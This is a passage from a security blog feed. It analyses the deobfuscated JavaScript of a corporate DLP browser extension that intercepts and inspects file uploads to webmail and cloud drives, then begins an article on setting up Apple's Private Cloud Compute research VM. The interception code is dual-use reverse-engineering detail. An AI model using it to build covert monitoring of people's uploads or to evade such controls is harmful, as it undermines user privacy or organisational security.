y.setRequestHeader(<span class="hljs-string">"X-Private"</span>, <span class="hljs-string">"false"</span>);
</code></pre>
<p>The extension pays special attention to email systems, particularly Gmail and Yahoo Mail. It includes specific patterns for monitoring these services. When an error occurs during email attachment uploads, the extension can trigger a page reload to ensure proper functionality.</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">var</span> H = <span class="hljs-string">"ALLOW"</span>,
    O = !<span class="hljs-number">1</span>,
    U = !<span class="hljs-number">1</span>,
    D = {},
    X = <span class="hljs-string">"12345678"</span>,
    o = {},
    e = [<span class="hljs-string">"https://mail.google.com/*"</span>, <span class="hljs-string">"https://mail.yahoo.com/*"</span>],
    r = [<span class="hljs-string">"mail\\.google\\.com\\/sync"</span>, <span class="hljs-string">"mail\\.yahoo\\.com\\/ws\\/v3\\/batch\\?name=messages"</span>],
    a = {},
    l = !<span class="hljs-number">0</span>;

<span class="hljs-comment">// [...]</span>

chrome.webRequest.onErrorOccurred.addListener(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">t</span>) </span>{
    <span class="hljs-keyword">if</span> (<span class="hljs-keyword">void</span> <span class="hljs-number">0</span> !== t &amp;&amp; <span class="hljs-string">"POST"</span> == t.method &amp;&amp; 
        <span class="hljs-string">"net::ERR_BLOCKED_BY_CLIENT"</span> == t.error) {
        <span class="hljs-keyword">let</span> e = <span class="hljs-keyword">new</span> <span class="hljs-built_in">RegExp</span>(r.join(<span class="hljs-string">"|"</span>), <span class="hljs-string">"i"</span>);
        e.test(t.url) &amp;&amp; chrome.tabs.query({
            <span class="hljs-attr">active</span>: <span class="hljs-literal">true</span>,
            <span class="hljs-attr">currentWindow</span>: <span class="hljs-literal">true</span>
        }, <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">e</span>) </span>{
            chrome.tabs.reload(e[<span class="hljs-number">0</span>].id)
        })
    }
}, {
    <span class="hljs-attr">urls</span>: e
});
</code></pre>
<p>The content script component of the extension monitors file input elements on web pages, allowing it to detect when users attempt to upload files. This monitoring system uses <code>MutationObserver</code> to detect dynamically added file inputs, ensuring comprehensive coverage of all possible file upload attempts on a page.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">t</span>(<span class="hljs-params"></span>) </span>{
    <span class="hljs-keyword">var</span> e;
    <span class="hljs-keyword">for</span> (e <span class="hljs-keyword">of</span> <span class="hljs-built_in">document</span>.body.getElementsByTagName(<span class="hljs-string">"input"</span>)) 
        <span class="hljs-keyword">if</span> (<span class="hljs-string">"file"</span> === e.type &amp;&amp; <span class="hljs-keyword">void</span> <span class="hljs-number">0</span> === e._fp_processed) {
            e.addEventListener(<span class="hljs-string">"click"</span>, o, <span class="hljs-literal">true</span>);
            e._fp_processed = <span class="hljs-literal">true</span>;
        }
}

<span class="hljs-keyword">const</span> e = <span class="hljs-keyword">new</span> MutationObserver(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">e</span>) </span>{
    t()
});
e.observe(<span class="hljs-built_in">document</span>.body, {
    <span class="hljs-attr">childList</span>: <span class="hljs-literal">true</span>,
    <span class="hljs-attr">subtree</span>: <span class="hljs-literal">true</span>
});
</code></pre>
<h2 id="heading-verifications">Verifications</h2>
<p>At the core of the extension's security is its authentication system with a local server. This system ensures that the extension is genuine and actively managed by the organization's security infrastructure. The authentication process begins with a periodic check to the local server. The plugin establishes a heartbeat connection with the local security server. The extension validates itself every 15 seconds, switching between HTTPS and HTTP if needed, and maintains a state flag (O) that determines whether the extension is authorized to intercept traffic. The use of the extension ID in the authentication request creates a unique identifier for each installation.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">i</span>(<span class="hljs-params"></span>) </span>{
    <span class="hljs-keyword">var</span> t, e = <span class="hljs-keyword">new</span> XMLHttpRequest;
    e.onreadystatechange = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) </span>{
        <span class="hljs-number">4</span> == e.readyState &amp;&amp; (<span class="hljs-number">200</span> == e.status ? 
            (U = <span class="hljs-string">"MOMOMO"</span> == e.responseText, O = !<span class="hljs-number">0</span>) : 
            <span class="hljs-number">0</span> == e.status || <span class="hljs-number">500</span> == e.status ? O = !<span class="hljs-number">1</span> : 
            (O = !<span class="hljs-number">0</span>, <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"GET response ERROR code: "</span> + e.status)))
    };
    e.addEventListener(<span class="hljs-string">"error"</span>, <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">e</span>) </span>{
        l ? (l = !<span class="hljs-number">1</span>, i(), <span class="hljs-built_in">clearTimeout</span>(t)) : l = !<span class="hljs-number">0</span>
    });
    e.open(<span class="hljs-string">"GET"</span>, I() + chrome.runtime.id, !<span class="hljs-number">0</span>);
    e.send();
    t = <span class="hljs-built_in">setTimeout</span>(i, <span class="hljs-number">15e3</span>)
}
</code></pre>
<p>The extension implements a request tracking system that prevents duplicate uploads and maintains an audit trail. This system uses MD5 hashing to create unique fingerprints of requests.</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">var</span> v = L(m += l + w);
T();
<span class="hljs-keyword">if</span> (v <span class="hljs-keyword">in</span> D) {
    <span class="hljs-keyword">return</span> { <span class="hljs-attr">cancel</span>: <span class="hljs-literal">true</span> };
}
D[v] = r.timeStamp;
</code></pre>
<h2 id="heading-content-parsing">Content Parsing</h2>
<p>The extension performs content inspection, particularly focusing on file uploads and attachments. It implements specialized parsers for different types of content, including multipart form data and specialized upload protocols.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">x</span>(<span class="hljs-params">e</span>) </span>{
    <span class="hljs-keyword">var</span> t = <span class="hljs-string">"boundary="</span>,
        r = <span class="hljs-string">""</span>,
        n = e.search(t);
    <span class="hljs-keyword">if</span> (<span class="hljs-number">-1</span> != n) {
        n += t.length;
        r = <span class="hljs-number">-1</span> == (t = e.search(<span class="hljs-string">"\r\n"</span>)) ? 
            e.substr(n) : e.substr(n, t);
        <span class="hljs-keyword">if</span> (<span class="hljs-string">'"'</span> == r.charAt(<span class="hljs-number">0</span>)) {
            r = r.slice(<span class="hljs-number">1</span>, r.length - <span class="hljs-number">1</span>);
        }
    }
    <span class="hljs-keyword">return</span> r;
}
</code></pre>
<p>This boundary detection function is crucial for accurately parsing multipart form data, which is commonly used for file uploads. The extension uses this information to properly separate and analyze individual parts of the upload content.</p>
<p>The extension implements a comprehensive file upload control system that operates at multiple levels. At the DOM level, it monitors file input elements.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">t</span>(<span class="hljs-params"></span>) </span>{
    <span class="hljs-keyword">var</span> e;
    <span class="hljs-keyword">for</span> (e <span class="hljs-keyword">of</span> <span class="hljs-built_in">document</span>.body.getElementsByTagName(<span class="hljs-string">"input"</span>)) {
        <span class="hljs-keyword">if</span> (<span class="hljs-string">"file"</span> === e.type &amp;&amp; <span class="hljs-keyword">void</span> <span class="hljs-number">0</span> === e._fp_processed) {
            e.addEventListener(<span class="hljs-string">"click"</span>, o, !<span class="hljs-number">0</span>);
            e._fp_processed = !<span class="hljs-number">0</span>;
        }
    }
}

<span class="hljs-keyword">const</span> e = <span class="hljs-keyword">new</span> MutationObserver(<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">e</span>) </span>{
    t()
});
e.observe(<span class="hljs-built_in">document</span>.body, {
    <span class="hljs-attr">childList</span>: !<span class="hljs-number">0</span>,
    <span class="hljs-attr">subtree</span>: !<span class="hljs-number">0</span>
});
</code></pre>
<p>This creates a monitoring system that catches all file upload attempts, even on dynamically loaded content. When a file input is clicked, the extension notifies the background script.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">o</span>(<span class="hljs-params">e</span>) </span>{
    <span class="hljs-built_in">window</span>.addEventListener(<span class="hljs-string">"focus"</span>, n);
    chrome.runtime.sendMessage({
        <span class="hljs-attr">type</span>: <span class="hljs-string">"open_file_dialog"</span>
    });
}
</code></pre>
<p>The extension includes specialized handling for Microsoft OneDrive's upload protocol. This parser specifically looks for OneDrive's upload session creation endpoints. It decodes the URL and extracts the relevant path information. The function is designed to handle OneDrive's specific URL format where file paths are embedded within the URL structure.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">P</span>(<span class="hljs-params">e</span>) </span>{
    <span class="hljs-keyword">var</span> t = <span class="hljs-built_in">decodeURIComponent</span>(e),
        r = <span class="hljs-string">""</span>,
        n = t.lastIndexOf(<span class="hljs-string">":/oneDrive.createUploadSession"</span>);
    <span class="hljs-keyword">if</span> (<span class="hljs-number">-1</span> != n) {
        e = t.substr(<span class="hljs-number">0</span>, n).lastIndexOf(<span class="hljs-string">":/"</span>);
        <span class="hljs-keyword">if</span> (<span class="hljs-number">-1</span> != e) {
            r = t.slice(e += <span class="hljs-string">":/"</span>.length, n);
        }
    }
    <span class="hljs-keyword">return</span> r;
}
</code></pre>
<p>The extension implements specialized parsing for Microsoft 365 SharePoint URLs and uploads. This parser handles SharePoint's specific URL encoding format. It first decodes the URL, then looks for specific patterns that indicate file operations. The parser is designed to extract the actual file path from SharePoint's complex URL structure.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">E</span>(<span class="hljs-params">e</span>) </span>{
    <span class="hljs-keyword">var</span> t = <span class="hljs-built_in">decodeURIComponent</span>(e),
        r = y(t);
    <span class="hljs-keyword">if</span> (<span class="hljs-string">""</span> == r) <span class="hljs-keyword">return</span> <span class="hljs-string">""</span>;

    e = t.indexOf(r += <span class="hljs-string">"='"</span>);
    <span class="hljs-keyword">if</span> (<span class="hljs-number">-1</span> == e) <span class="hljs-keyword">return</span> <span class="hljs-string">""</span>;

    e += r.length;
    r = t.substr(e).indexOf(<span class="hljs-string">"'"</span>);
    <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span> == r ? t.substr(e) : t.substr(e, r)
}
</code></pre>
<p>The extension also includes special handling for Google Drive's upload protocol. Google Drive uses different upload protocols depending on the file size and type, with smaller files using a simple direct upload where the entire file is sent in a single request.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">B</span>(<span class="hljs-params">e</span>) </span>{
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">var</span> t <span class="hljs-keyword">of</span> e)
        <span class="hljs-keyword">if</span> (<span class="hljs-string">"x-goog-upload-protocol"</span> == t.name.toLowerCase()) 
            <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;
    <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;
}
</code></pre>
<p>When multi-part uploads are detected, the extension applies specific processing rules. Multi-part connections happen when uploading multiple files simultaneously, when metadata needs to be sent along with the file content, when using the browser's FormData API for uploads, or when uploading through the Google Drive API's multipart endpoint.</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">if</span> (<span class="hljs-string">"PUT"</span> == r.method &amp;&amp; <span class="hljs-number">0</span> == B(r.requestHeaders)) {
    S(r.requestId);
    <span class="hljs-keyword">return</span> { <span class="hljs-attr">cancel</span>: <span class="hljs-literal">false</span> };
}
</code></pre>
<p>The extension implements a form data processing that can handle both standard form data and file uploads. This code shows how the extension processes form data, handling both file names and actual content. It includes size limits (524288 bytes) to prevent memory issues with large uploads, and it carefully formats the multipart data according to HTTP standards.</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">if</span> (c.formData &amp;&amp; <span class="hljs-literal">null</span> != c.formData) {
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">var</span> R <span class="hljs-keyword">in</span> c.formData) {
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">let</span> e = <span class="hljs-number">0</span>; e &lt; c.formData[R].length; e++) {
            <span class="hljs-keyword">if</span> (<span class="hljs-literal">null</span> != c.formData[R][e]) {
                <span class="hljs-keyword">if</span> (<span class="hljs-literal">null</span> != c.formData[R][e].match(<span class="hljs-regexp">/^[\w\s-\.\)\(]+\.[\w]{1,5}$/</span>)) {
                    l += c.formData[R][e] + <span class="hljs-string">"\n"</span>;
                } <span class="hljs-keyword">else</span> {
                    <span class="hljs-keyword">if</span> (<span class="hljs-string">""</span> != i) {
                        s += <span class="hljs-string">"\r\n--"</span> + i;
                        s += <span class="hljs-string">"\r\nContent-Disposition: form-data; "</span>;
                        s += <span class="hljs-string">'name="'</span> + R + <span class="hljs-string">'"\r\n\r\n'</span>;
                    }
                    s += c.formData[R][e].substring(<span class="hljs-number">0</span>, 
                         <span class="hljs-built_in">Math</span>.min(<span class="hljs-number">524288</span>, c.formData[R][e].length));
                }
            }
        }
    }
}
</code></pre>
<p>For raw binary uploads, the extension implements specialized buffer handling. It uses <code>TypedArrays</code> and <code>ArrayBuffers</code> for binary data handling, crucial for processing large file uploads by combining multiple chunks into a single buffer when necessary.</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">if</span> (<span class="hljs-literal">null</span> != c.raw) {
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">let</span> e = <span class="hljs-number">0</span>; e &lt; c.raw.length; e++) {
        <span class="hljs-keyword">if</span> (<span class="hljs-literal">null</span> != c.raw[e].bytes) {
            u = <span class="hljs-literal">null</span> == u ? c.raw[e].bytes : (
                t = <span class="hljs-keyword">new</span> <span class="hljs-built_in">ArrayBuffer</span>(u.byteLength + c.raw[e].bytes.byteLength),
                n = <span class="hljs-keyword">new</span> <span class="hljs-built_in">Uint8Array</span>(t),
                a = <span class="hljs-keyword">new</span> <span class="hljs-built_in">Uint8Array</span>(u),
                o = <span class="hljs-keyword">new</span> <span class="hljs-built_in">Uint8Array</span>(c.raw[e].bytes),
                n.set(a, <span class="hljs-number">0</span>),
                n.set(o, a.length),
                t
            );
        } <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-literal">null</span> != c.raw[e].file) {
            l += c.raw[e].file + <span class="hljs-string">"\n"</span>;
        }
    }
}
</code></pre>
<h2 id="heading-policy-enforcement">Policy Enforcement</h2>
<p>The extension communicates with the local server to make blocking decisions. It sends detailed metadata about each request, including the URL, status, referrer, and file information. The server's response determines whether the request should be allowed or blocked.</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">var</span> y = <span class="hljs-keyword">new</span> XMLHttpRequest;
y.open(<span class="hljs-string">"POST"</span>, I() + X, b);
y.setRequestHeader(<span class="hljs-string">"X-Email-Url"</span>, e.url);
y.setRequestHeader(<span class="hljs-string">"X-Status"</span>, e.statusCode);
y.setRequestHeader(<span class="hljs-string">"X-Referrer"</span>, e.originUrl);
y.setRequestHeader(<span class="hljs-string">"X-Initiator"</span>, e.initiator);
y.setRequestHeader(<span class="hljs-string">"X-Private"</span>, <span class="hljs-string">"false"</span>);
y.setRequestHeader(<span class="hljs-string">"X-Attach-File"</span>, btoa(<span class="hljs-built_in">unescape</span>(<span class="hljs-built_in">encodeURIComponent</span>(m))));

<span class="hljs-keyword">try</span> {
    y.send(w);
} <span class="hljs-keyword">catch</span> (e) {
    O = !<span class="hljs-number">1</span>;
}

<span class="hljs-keyword">if</span> (<span class="hljs-number">4</span> == y.readyState) {
    <span class="hljs-keyword">if</span> (<span class="hljs-number">200</span> == y.status) {
        H = y.responseText;
    } <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-number">0</span> == y.status || <span class="hljs-number">500</span> == y.status) {
        O = !<span class="hljs-number">1</span>;
    } <span class="hljs-keyword">else</span> {
        <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"POST response ERROR code: "</span> + y.status);
        H = <span class="hljs-string">"BLOCK"</span>;
    }
}
</code></pre>
<h1 id="heading-conclusions">Conclusions</h1>
<p>To be fully honest, I’m not really sure about whats the solution here. Alternative approaches like proxy-based monitoring, HTTPS inspection, network drivers, or OS-level hooks fall short because they either cannot handle encrypted traffic without complex PKI infrastructure, lack browser-specific context, or miss operations happening within the browser sandbox.</p>
<p>But what i can say is that DLP solutions are often employed by overly paranoid workplaces seeking to monitor their user behaviors. And instead of pitching their capabilities to protect data from leaking or being exposed publically, many DLP vendors tout more… creative ways to use their product.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1735657671103/98df7c54-d238-42c2-92ee-2148f1dcda45.jpeg" alt class="image--center mx-auto" /></p>
<p>Limiting what people can read on Twitter? Blocking likes in Facebook? What business or security case you can make for doing such things? Its very clear who these tools are marketed towards, and they’re not even hiding it. I also take issue with the fact that they’re pitching these for firms who wanna install them on the personal devices of workers, which is a whole other can of worms.</p>
<p>Honestly, the solution is just don’t use these things. Trust me, there is no business case to spy on my three hour doomscrolling session.</p>
]]></content:encoded></item><item><title><![CDATA[Peeking Inside Apple's Private Cloud Compute]]></title><description><![CDATA[Cover Illustration by onigiriice———————————————————————————————————————
The article contains partial content similar to Matteyeux’s article on the PCC VRE, for more observations about the firmware and its debuggability see the article here

During th...]]></description><link>https://research.meekolab.com/peeking-inside-apples-private-cloud-compute</link><guid isPermaLink="true">https://research.meekolab.com/peeking-inside-apples-private-cloud-compute</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Thu, 14 Nov 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1732169524167/e80d5f1c-3969-49ca-889b-63cbc686be28.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by onigiriice</em></strong><br />———————————————————————————————————————</p>
<p>The article contains partial content similar to Matteyeux’s article on the PCC VRE, for more observations about the firmware and its debuggability see the article <a target="_blank" href="https://blog.matteyeux.com/posts/pcc/">here</a></p>
</blockquote>
<p>During the development of the iPhone 5s, Apple wanted to do biometrics login with fingerprint scanners but needed a way to store them securely. They have bought the <a target="_blank" href="https://www.reuters.com/article/us-authentec-acquisition-apple-idUSBRE86Q0KD20120727/">provider of the hardware</a> that will eventually be Touch ID, but needed a way to securely store these biometrics data. If people were gonna give their fingerprint data, they needed to be convinced that it would be safe, unless they <a target="_blank" href="https://www.youtube.com/watch?v=BO8Uy2-t1Mk">want a PR nightmare</a>.</p>
<p>Thus they created the Secure Enclave Processor (SEP), which was built around a dedicated ARMv7a "Kingfisher" core, completely separate from the main application processor (it was not ARM TrustZone, <a target="_blank" href="https://dl.acm.org/doi/abs/10.1145/3308755.3308761">contrary to some accounts</a>). The SEP's isolation ensures that even EL3 (highest privilege level) on the main processor cannot access the Secure Enclave.</p>
<p>Overtime, the responsibility of the Secure Enclave <a target="_blank" href="https://support.apple.com/guide/security/secure-enclave-sec59b0b31ff/web">grew</a> to storing banking credentials for Apple Pay, deployment of secure memory regions for trusted execution, secure booting, encryption acceleration, and many more. Today, storing sensitive data feels like second nature, and we trust its security.</p>
<p>With the advent of Generative AI, companies have been rushing to implement LLMs and Image Generation technologies with <a target="_blank" href="https://www.malwarebytes.com/blog/news/2024/06/microsoft-recall-delayed-after-privacy-and-security-concerns">little to no concern for privacy</a>. Apple is suddenly thrusted into the same dilemma they faced in 2013, as a <a target="_blank" href="https://www.pewresearch.org/short-reads/2023/10/18/key-findings-about-americans-and-data-privacy">Pew Research Center survey</a> said that 70% of people say they have little to no trust in companies to make responsible decisions about how they use AI in their products and 81% say the information companies collect will be used in ways that people are not comfortable with.</p>
<h1 id="heading-early-leaps-later-bottlenecks">Early Leaps, Later Bottlenecks</h1>
<p>Apple has pride itself on using less memory compared to its competitors, due to its investments in effective memory management for the Darwin kernel which uses Automatic Reference Counting (ARC) as opposed to Android’s use of regular Garbage Collection.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729860817329/6f91d19b-d73a-4946-a35f-d3b68a4b3689.png" alt class="image--center mx-auto" /></p>
<p>ARC works by having the compiler manually add commands to allocate and release objects (memory) exactly when needed / done. There is overhead with this allocation/deallocation process. However, you end up only having to allocate exactly what you need and the deallocation process occurs in a very predictable manner so as not to interrupt the performance of other processes. GC on the other hand uses an asynchronous process to randomly go through cycles to check and see which memory can be deallocated</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729861981448/9a62cdfa-f4ad-4f30-8be7-cb7b0114e39e.png" alt class="image--center mx-auto" /></p>
<p>This is why iPhones for years have been comfortable with 6 GB of RAM, while flagship Android devices have hit <a target="_blank" href="https://www.wired.com/review/google-pixel-9-pixel-9-pro-and-pixel-9-pro-xl/#:~:text=16%20GB%20RAM-,Tensor%20G4%20with%2016%20GB%20RAM,-Storage%3A">16 GB</a> even <a target="_blank" href="https://www.gsmarena.com/honor_90_gt_debuts_with_snapdragon_8_gen_2_and_up_to_24gb_ram-news-61001.php">24 GB</a> of RAM. But this came to bite them when they want to start doing on-device AI inference, which are notoriously memory hungry. Despite efforts like <a target="_blank" href="https://huggingface.co/apple/OpenELM">OpenELM</a>, Apple still cannot escape the need to run models in the cloud.</p>
<p>While hardware advances, its likely that advances within LLMs and ImageGen technologies will surpass what is ever capable to be run within mobile battery-powered devices. Seperating data from ML models is hard, because ML models <a target="_blank" href="https://arxiv.org/abs/1802.08232">memorize data encoded in their weights</a> as part of training. So there are several ways currently being pursued to do this task, such as :</p>
<ul>
<li><p><a target="_blank" href="https://arxiv.org/pdf/1912.03817">Machine Unlearning</a>, which is a scheme to remove data from a model. Unfortunately, <a target="_blank" href="https://www.usenix.org/system/files/sec22fall_thudi.pdf">further proof</a> has shown it to be impossible to formally prove by just querying a model</p>
</li>
<li><p><a target="_blank" href="https://web.archive.org/web/20240812213844/https://securecomputation.org/docs/pragmaticmpc.pdf">Secure Multi-Party Computation</a> (SMC), which enables multiple parties to jointly do inference with private data without revealing the actual data to each other through cryptographic protocols, but this requires significant computational overhead</p>
</li>
<li><p><a target="_blank" href="https://dl.acm.org/doi/10.1145/1536414.1536440">Homomorphic Encryption</a> (HE), which is a method to do complex mathematical operations (including inference) on encrypted data without compromising the encryption. This field has received alot of attention, with scalable solutions like the <a target="_blank" href="https://machinelearning.apple.com/research/homomorphic-encryption">Brakerski-Fan-Vercauteren Scheme</a> being used by Apple on some smaller ML workloads</p>
</li>
<li><p>Confidential Computing, which is the isolation of data and workloads within a protected central processing unit (CPU) while it is being processed, this is the solution favored by giants like Google and Apple, and which will be the focus of today’s article</p>
</li>
</ul>
<h1 id="heading-private-cloud-compute">Private Cloud Compute</h1>
<p>Private Compute Compute (PCC) was created to solve this very issue, a way to run stateless inference in the cloud. This means that while your data goes to the cloud, the data and the model itself won’t accessible and used for further AI training.</p>
<p>Stated by the website itself, PCC has a few key design goals :</p>
<ul>
<li><p><strong>Stateless computation</strong>: Use personal data only for the immediate task, then delete it completely. No storing or saving allowed</p>
</li>
<li><p><strong>Enforceable guarantees</strong>: All parts of the system must be verifiablee to ensure they're following the rules</p>
</li>
<li><p><strong>No special access</strong>: Even system administrators can't bypass privacy protections</p>
</li>
<li><p><strong>Non-targetability</strong>: Attackers shouldn't be able to target specific users - they'd have to try attacking everyone at once</p>
</li>
<li><p><strong>Verifiable transparency</strong>: Outside experts must be able to check that the system actually does what we say it does</p>
</li>
</ul>
<p>This article will attempt to dive more into the security and hardening attempts of CloudOS, but more indepth research will probably be done by people way more talented than i am. I see myself more as a tourist, than a tour guide, for this topic.</p>
<p>To do so, we need to setup the PCC Virtual Research Environment (VRE), which is a part of the macOS 15.1 Developer Preview. The installation process is nearly identical, in that you will need to allow your Mac to run security research VMs, which you can configure within the RecoveryOS terminal by running the following command :</p>
<pre><code class="lang-plaintext">csrutil allow-research-guests enable
</code></pre>
<p>The tools is located in <code>/System/Library/SecurityResearch/usr/bin</code>, and requires you to set your shell’s <code>PATH</code> to includes this directory. With iTerm i did this by putting <code>export PATH=$PATH:/System/Library/SecurityResearch/usr/bin</code> at the bottom of my <code>~/.zshrc</code> file.</p>
<p>After this you’ll need to agree to the license using <code>sudo pccvre license</code>, which grants you research usage to the code and assets within the PCC Virtual Research. Uniquely, <a target="_blank" href="https://github.com/apple/security-pcc/blob/main/LICENSE">this license</a> only grants usage for the VRE for 90-days, which I’m not exactly sure how they’re going to enforce in an open-source project. After agreeing, we can interact fully with the VRE.</p>
<p>We can start by listing the available releases available for download, and then downloading them. When a PCC VRE release has already been downloaded, it does a simple hash check to ensure the integrity of the version that you have on-device. For this instance we are going to use version 1245 which was the latest version at the time of writing, however the example below also shows downloading of a release with a similar hash (1244) and the downloading of a release that is not yet in disk (1242).</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729960823177/d16c5683-3693-4085-89f4-60b32f5d416b.png" alt class="image--center mx-auto" /></p>
<p>Then you can create an instance using <code>pccvre instance create</code>, which will show you the iBoot Serial Console output and the detailed process of the instance.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729961471253/50549b51-6181-48d3-b169-e578686498bc.png" alt class="image--center mx-auto" /></p>
<p>When the PCCVRE tool is done creating an instance, it will be in an inactive state so to start interacting with it you will need to spin it up. But before doing so, we can interact with the PCC VRE using the <code>darwin-init</code> tool.</p>
<pre><code class="lang-json">➜  ~ pccvre instance configure darwin-init dump -N testing
{
  <span class="hljs-attr">"apply-timeout"</span> : <span class="hljs-string">"60min"</span>,
  <span class="hljs-attr">"config-security-policy-version"</span> : <span class="hljs-number">8</span>,
    <span class="hljs-attr">"cryptex"</span> : [
    {
      <span class="hljs-attr">"url"</span> : <span class="hljs-string">"f81cafe498a1081049be16f3c7bc58468d3cb7722aebe365632d99fc0f8a389a.aar"</span>,
      <span class="hljs-attr">"variant"</span> : <span class="hljs-string">"FM_LANGUAGE_SECURITY_RESEARCH_V1"</span>
    },
    {
      <span class="hljs-attr">"url"</span> : <span class="hljs-string">"2bd63bffc9f8fb5f6827ce5cd4dbbed05f9a7afaad50e01f6c2f71f4fa2796e5.aar"</span>,
      <span class="hljs-attr">"variant"</span> : <span class="hljs-string">"PrivateCloud Support"</span>
    },
    {
      <span class="hljs-attr">"url"</span> : <span class="hljs-string">"74301a8be3c61debc1377a80b7eeebfbab36639176a5192768ebfe4ccc368a37.aar"</span>,
      <span class="hljs-attr">"variant"</span> : <span class="hljs-string">"Debug Shell for Private Cloud Security Research VM"</span>
    }
  ],
  <span class="hljs-attr">"log"</span> : {
    <span class="hljs-attr">"system-log-privacy-level"</span> : <span class="hljs-string">"Public"</span>,
    <span class="hljs-attr">"system-logging-enabled"</span> : <span class="hljs-literal">false</span>
  },
  <span class="hljs-attr">"preferences"</span> : [
    {
      <span class="hljs-attr">"application_id"</span> : <span class="hljs-string">"com.apple.cloudos.cloudOSInfo"</span>,
      <span class="hljs-attr">"key"</span> : <span class="hljs-string">"cloudOSBuildVersion"</span>,
      <span class="hljs-attr">"value"</span> : <span class="hljs-string">"3B5621j.1"</span>
    },
    {
      <span class="hljs-attr">"application_id"</span> : <span class="hljs-string">"com.apple.cloudos.cloudboardd"</span>,
      <span class="hljs-attr">"key"</span> : <span class="hljs-string">"GRPC"</span>,
      <span class="hljs-attr">"value"</span> : {
        <span class="hljs-attr">"ListeningIP"</span> : <span class="hljs-string">"0.0.0.0"</span>,
        <span class="hljs-attr">"UseSelfSignedCertificate"</span> : <span class="hljs-literal">true</span>
      }
    },
    {
      <span class="hljs-attr">"application_id"</span> : <span class="hljs-string">"com.apple.cloudos.cloudOSInfo"</span>,
      <span class="hljs-attr">"key"</span> : <span class="hljs-string">"serverOSReleaseType"</span>,
      <span class="hljs-attr">"value"</span> : <span class="hljs-string">"Darwin Cloud Customer Install"</span>
    },
    {
      <span class="hljs-attr">"application_id"</span> : <span class="hljs-string">"com.apple.cloudos.cloudOSInfo"</span>,
      <span class="hljs-attr">"key"</span> : <span class="hljs-string">"cloudOSReleaseType"</span>,
      <span class="hljs-attr">"value"</span> : <span class="hljs-string">"Private cloudOS Customer"</span>
    }
  ],
  <span class="hljs-attr">"result"</span> : {
    <span class="hljs-attr">"failureAction"</span> : <span class="hljs-string">"exit"</span>
  },
  <span class="hljs-attr">"secure-config"</span> : {
    <span class="hljs-attr">"com.apple.logging.crashRedactionEnabled"</span> : <span class="hljs-literal">true</span>,
    <span class="hljs-attr">"com.apple.logging.logFilteringEnforced"</span> : <span class="hljs-literal">true</span>,
    <span class="hljs-attr">"com.apple.logging.metricsFilteringEnforced"</span> : <span class="hljs-literal">true</span>,
    <span class="hljs-attr">"com.apple.logging.policyPath"</span> : <span class="hljs-string">"/private/var/PrivateCloudSupport/opt/audit-lists/customer/"</span>,
    <span class="hljs-attr">"com.apple.pcc.research.disableAppleInfrastrucutureEnforcement"</span> : <span class="hljs-literal">true</span>,
    <span class="hljs-attr">"com.apple.tie.allowClientToOverrideConstraints"</span> : <span class="hljs-literal">false</span>,
    <span class="hljs-attr">"com.apple.tie.allowClientToOverridePromptTemplate"</span> : <span class="hljs-literal">false</span>,
    <span class="hljs-attr">"com.apple.tie.allowNonProdExceptionOptions"</span> : <span class="hljs-literal">false</span>
  },
  <span class="hljs-attr">"ssh"</span> : <span class="hljs-literal">true</span>,
  <span class="hljs-attr">"SSH_DISABLED-config-security-policy"</span> : <span class="hljs-string">"customer"</span>,
  <span class="hljs-attr">"user"</span> : {
    <span class="hljs-attr">"gid"</span> : <span class="hljs-number">0</span>,
    <span class="hljs-attr">"name"</span> : <span class="hljs-string">"root"</span>,
    <span class="hljs-attr">"ssh_authorized_key"</span> : <span class="hljs-string">"ssh-rsa AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,
    "</span>uid<span class="hljs-string">" : 0
  },
  "</span>userspace-reboot<span class="hljs-string">" : "</span>rem<span class="hljs-string">"
